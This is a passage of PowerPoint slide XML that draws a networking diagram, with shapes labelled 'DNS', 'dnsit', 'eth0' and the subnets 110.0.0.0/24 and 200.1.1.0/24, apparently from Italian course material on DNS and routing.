                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="19729"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="1495" y="1531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5982" y="1531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="18539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="18539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="1531"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="7311" y="1531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7975" y="1531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7975" y="8334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7311" y="8334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7311" y="1531"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="7145" y="9865"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8142" y="9865"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8142" y="10715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7145" y="10715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7145" y="9865"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="8972" y="1531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="12462" y="1531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8972" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8972" y="1531"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="13625" y="1531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="20271" y="1531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20271" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13625" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13625" y="1531"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="18609" y="6463"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="20437" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20437" y="10885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18609" y="10885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18609" y="6463"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="F5F1F1"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="969696"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-GB"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43" name="WordArt 173">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B471989-6097-D76D-E61B-0D7495CA3B1A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1" noChangeShapeType="1" noTextEdit="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10714425" y="4391396"/>
              <a:ext cx="278148" cy="107828"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" fromWordArt="1">
              <a:prstTxWarp prst="textPlain">
                <a:avLst>
                  <a:gd name="adj" fmla="val 50000"/>
                </a:avLst>
              </a:prstTxWarp>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-GB" sz="3600" kern="10">
                  <a:ln w="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:round/>
                    <a:headEnd/>
                    <a:tailEnd/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>DNS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44" name="Text Box 169">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4865F66-10D8-627C-198D-D8CB1B7807BA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10432210" y="4653248"/>
              <a:ext cx="907197" cy="248402"/>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50000"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="it-IT" sz="1000" b="1" dirty="0" err="1"/>
                <a:t>dnsit</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="it-IT" sz="1000" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="45" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58B76A8B-868B-21CB-AFC3-6766F538FC3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6598589" y="1968796"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC104CF2-F878-B6F4-68AE-D68D58C53953}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3380"/>
              <a:ext cx="288" cy="124"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EAEAE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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>eth0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E4A3A0F-5C54-6AF2-90C2-3108D77F18D5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3264"/>
              <a:ext cx="288" cy="116"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>10</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="Text Box 153">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0D29176-7F5B-0EEC-098D-4A480AD9317E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7373670" y="1644027"/>
            <a:ext cx="1146468" cy="253916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="5F5F5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it-IT" altLang="it-IT" sz="1050" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>110.0.0.0/24</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="Line 151">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{390E9EBE-B486-CD88-B28D-DCE141583775}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4346573" y="5294208"/>
            <a:ext cx="1756921" cy="23324"/>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endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="52" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B222C9C1-095A-3A71-2CCE-75CCB09EFFC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5069517" y="5457813"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="53" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A23DA842-213D-DF7C-ECA3-29C00E7B5555}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3380"/>
              <a:ext cx="288" cy="124"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EAEAE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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>eth0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="54" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B3B2F4A-F2E6-38C3-53A9-CDA442BE2928}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3264"/>
              <a:ext cx="288" cy="116"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>10</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="Oval 152">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{023C69C6-65E7-5DFC-D5DD-97AE1D45FDB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4135015" y="5183863"/>
            <a:ext cx="220690" cy="220690"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>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it-IT" altLang="it-IT" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="Text Box 153">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A7193B7-AA32-52C6-7F95-A2AA78B3247B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3008088" y="4654593"/>
            <a:ext cx="1146468" cy="253916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="5F5F5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it-IT" altLang="it-IT" sz="1050" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>200.1.1.0/24</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="Line 149">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5AA5A5CE-617D-974C-FE11-51C51511BC2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3712201" y="4908509"/>
            <a:ext cx="442355" cy="397361"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="5F5F5F"/>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endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="61" name="Straight Connector 327">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FB79E05-27B5-596A-CD02-5B9286EC28B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5152303" y="2469897"/>
            <a:ext cx="49830" cy="283597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3" name="Group 227">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82B98C03-E2E5-BC7B-3D92-4DD909DD45FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4911658" y="2892462"/>
            <a:ext cx="441381" cy="243680"/>
            <a:chOff x="2859" y="339"/>
            <a:chExt cx="384" cy="212"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="9216" name="Group 228">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{828A1D90-5107-8BB9-AEA4-AE72BB4174E4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks noChangeAspect="1"/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2859" y="339"/>
              <a:ext cx="384" cy="212"/>
              <a:chOff x="5178" y="2567"/>
              <a:chExt cx="960" cy="528"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="9218" name="AutoShape 229">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{043E2CED-1C34-A448-DDB1-71C892D105FF}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5178" y="2567"/>
                <a:ext cx="960" cy="528"/>
              </a:xfrm>
              <a:prstGeom prst="can">
                <a:avLst>
                  <a:gd name="adj" fmla="val 50000"/>
                </a:avLst>
              </a:prstGeom>
              <a:gradFill rotWithShape="0">
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="002F5E"/>
                  </a:gs>
                  <a:gs pos="50000">
                    <a:srgbClr val="0066CC"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="002F5E"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="0" scaled="1"/>
              </a:gradFill>
              <a:ln w="9525">
                <a:solidFill>
                  <a:srgbClr val="819F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3025" tIns="36512" rIns="73025" bIns="36512"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it-IT" altLang="it-IT"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="9219" name="Group 231">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3255CD8D-6FFB-53AB-8410-75F52F74FD36}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="5372" y="2597"/>
                <a:ext cx="595" cy="204"/>
                <a:chOff x="3028" y="2194"/>
                <a:chExt cx="823" cy="291"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="9221" name="Freeform 232">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B948F00A-1BC0-ED93-5616-CC10644ECFBF}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3458" y="2201"/>
                  <a:ext cx="393" cy="125"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 393"/>
                    <a:gd name="T1" fmla="*/ 97 h 125"/>
                    <a:gd name="T2" fmla="*/ 87 w 393"/>
                    <a:gd name="T3" fmla="*/ 125 h 125"/>
                    <a:gd name="T4" fmla="*/ 298 w 393"/>
                    <a:gd name="T5" fmla="*/ 42 h 125"/>
                    <a:gd name="T6" fmla="*/ 393 w 393"/>
                    <a:gd name="T7" fmla="*/ 70 h 125"/>
                    <a:gd name="T8" fmla="*/ 342 w 393"/>
                    <a:gd name="T9" fmla="*/ 0 h 125"/>
                    <a:gd name="T10" fmla="*/ 94 w 393"/>
                    <a:gd name="T11" fmla="*/ 0 h 125"/>
                    <a:gd name="T12" fmla="*/ 196 w 393"/>
                    <a:gd name="T13" fmla="*/ 21 h 125"/>
                    <a:gd name="T14" fmla="*/ 0 w 393"/>
                    <a:gd name="T15" fmla="*/ 97 h 12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93" h="125">
                      <a:moveTo>
                        <a:pt x="0" y="97"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="87" y="125"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="298" y="42"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="393" y="70"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="342" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="94" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="196" y="21"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="97"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:extLst>
                  <a:ext uri="{91240B29-F687-4F45-9708-019B960494DF}">
                    <a14:hiddenLine xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" w="9525">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:round/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a14:hiddenLine>
                  </a:ext>
                </a:extLst>
              </p:spPr>
